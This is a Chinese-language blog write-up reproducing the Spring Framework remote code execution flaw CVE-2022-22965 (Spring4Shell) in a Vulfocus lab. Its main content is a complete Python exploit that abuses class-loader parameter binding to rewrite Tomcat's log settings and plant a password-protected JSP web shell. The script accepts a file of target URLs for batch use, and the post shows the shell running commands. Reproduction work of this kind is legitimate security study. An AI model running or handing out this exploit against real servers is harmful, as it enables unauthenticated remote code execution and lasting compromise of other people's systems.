Spring Framework 远程代码执行漏洞复现(CVE-2022-22965)

1、概述

Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。

2、受影响版本

  • Spring Core <= 5.2.19, <= 5.3.17
  • Spring Boot <= 2.6.5

3、利用前提

  • JDK 9 及以上版本
  • Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本,以及旧版本
  • Tomcat服务器

4、复现

进入VULFOCUS靶场复现,或者docker pull vulfocus/spring-core-rce-2022-03-29:latest拉一个镜像
进入靶场
在这里插入图片描述
使用EXP打一下,利用链是修改TOMCAT日志,向日志中写入shell。
这里最重要的是data部分,依次发送五个请求。
访问Tomcat日志,设置suffix后缀,设置路径webapp/root,设置前缀prefix等。

#!/usr/bin/env python3
#coding:utf-8

import requests
import argparse
from urllib.parse import urljoin

def Exploit(url):
    headers = {"suffix":"%>//",
                "c1":"Runtime",
                "c2":"<%",
                "DNT":"1",
                "Content-Type":"application/x-www-form-urlencoded"

    }
    data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    try:

        go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
        shellurl = urljoin(url, 'tomcatwar.jsp')
        shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
        if shellgo.status_code == 200:
            print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
    except Exception as e:
        print(e)
        pass




def main():
    parser = argparse.ArgumentParser(description='Srping-Core Rce.')
    parser.add_argument('--file',help='url file',required=False)
    parser.add_argument('--url',help='target url',required=False)
    args = parser.parse_args()
    if args.url:
        Exploit(args.url)
    if args.file:
        with open (args.file) as f:
            for i in f.readlines():
                i = i.strip()
                Exploit(i)

if __name__ == '__main__':
    main()

python3 ./exp.py --url http://vuln-ip:port/
在这里插入图片描述
访问一下该shell地址可以看到执行的whoami输出
在这里插入图片描述
ls输出
在这里插入图片描述
也可以使用curl --output - "url"看结果

5、参考文章

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://security.berkeley.edu/news/vulnerability-spring-framework-cve-2022-22965?msclkid=f7cbb0a9b18711ec93d7e178fb35f3ba
https://github.com/craig/SpringCore0day

你可能感兴趣的:(spring,网络安全,安全,tomcat,java)